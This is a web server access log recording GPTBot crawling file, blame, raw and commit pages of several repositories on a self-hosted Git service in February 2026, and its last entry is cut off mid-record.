"/windpacer/dbserver/blame/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 12738] [Gzip 6.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:15:22:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11283] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11311] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 24288] [Gzip 9.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:22:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10289] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts?display=source" [Client 74.7.227.38] [Length 11901] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/vite.config.ts" +[17/Feb/2026:15:22:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/main.py" +[17/Feb/2026:15:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/main.py" +[17/Feb/2026:15:22:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10879] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/package.json" +[17/Feb/2026:15:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9951] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:22:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 9965] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:22:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 26861] [Gzip 20.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" [Client 74.7.227.38] [Length 16698] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:15:23:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 114] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" +[17/Feb/2026:15:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json?display=source" [Client 74.7.227.38] [Length 11683] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" +[17/Feb/2026:15:23:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10843] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" +[17/Feb/2026:15:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" +[17/Feb/2026:15:23:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json?display=source" [Client 74.7.227.38] [Length 11684] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/package.json" +[17/Feb/2026:15:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" +[17/Feb/2026:15:23:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10876] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/package.json" +[17/Feb/2026:15:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11839] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" +[17/Feb/2026:15:23:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json?display=source" [Client 74.7.227.38] [Length 11020] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" +[17/Feb/2026:15:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10846] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/status.json" +[17/Feb/2026:15:23:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10842] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/tsconfig.json" +[17/Feb/2026:15:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11251] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/metadata.json" +[17/Feb/2026:15:23:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json?display=source" [Client 74.7.227.38] [Length 11654] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" +[17/Feb/2026:15:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json?display=rendered" [Client 74.7.227.38] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/package.json" +[17/Feb/2026:15:23:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json?display=source" [Client 74.7.227.38] [Length 11682] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/package.json" +[17/Feb/2026:15:23:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10267] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:15:23:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11402] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build" +[17/Feb/2026:15:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?files=GoldPilot%2f.vscode" [Client 74.7.227.38] [Length 21470] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode" +[17/Feb/2026:15:23:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/2681563c08aa04fbea2862fbca273762e67c16d6?files=html%2fstatus.json" [Client 74.7.227.38] [Length 19061] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:15:23:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=html%2fstatus.json" [Client 74.7.227.38] [Length 21732] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:15:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 20343] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:23:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15802] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/README.md" +[17/Feb/2026:15:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md?display=source" [Client 74.7.227.38] [Length 15797] [Gzip 4.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/README.md" +[17/Feb/2026:15:23:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=.Backup%2fhtml%2fassets%2fimages%2fdcsintegration.png" [Client 74.7.227.38] [Length 19813] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/assets/images/dcsintegration.png" +[17/Feb/2026:15:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/metadata.json" +[17/Feb/2026:15:23:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/PostgresWatchdog/ReadMe.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog" +[17/Feb/2026:15:23:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/PostgresWatchdog/ReadMe.md" +[17/Feb/2026:15:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1?files=html%2fstatus.json" [Client 74.7.227.38] [Length 18623] [Gzip 3.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/status.json" +[17/Feb/2026:15:23:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 10462] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:23:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 9942] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/compile_commands.json" +[17/Feb/2026:15:23:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c?files=.Backup%2fhtml%2findex.tsx" [Client 74.7.227.38] [Length 23403] [Gzip 3.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/index.tsx" +[17/Feb/2026:15:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" +[17/Feb/2026:15:23:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/Project%20Planning-1.md" [Client 74.7.227.38] [Length 43127] [Gzip 20.30] [Sent-to 